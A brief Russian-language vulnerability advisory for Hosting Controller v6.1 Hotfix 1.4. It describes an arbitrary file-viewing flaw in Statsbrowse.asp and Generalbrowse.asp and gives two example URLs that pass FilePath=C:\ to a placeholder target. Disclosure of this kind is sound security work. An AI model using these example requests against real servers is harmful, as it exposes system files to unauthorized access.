Программа: Hosting Controller v.6.1 Hotfix 1.4
Обнаружена уязвимость в Hosting Controller. Удаленный авторизованный пользователь может просмотреть произвольные файлы на системе.
Уязвимость существует в файлах 'Statsbrowse.asp' и 'Generalbrowser.asp' из-за некорректной фильтрации входных данных.
Пример:
http://[target]/admin/mail/Statsbrowse.asp? FilePath=c:\&Opt=3&level=1&upflag=0
http://[target]/admin/iis/Generalbrowse.asp? FilePath=C:\
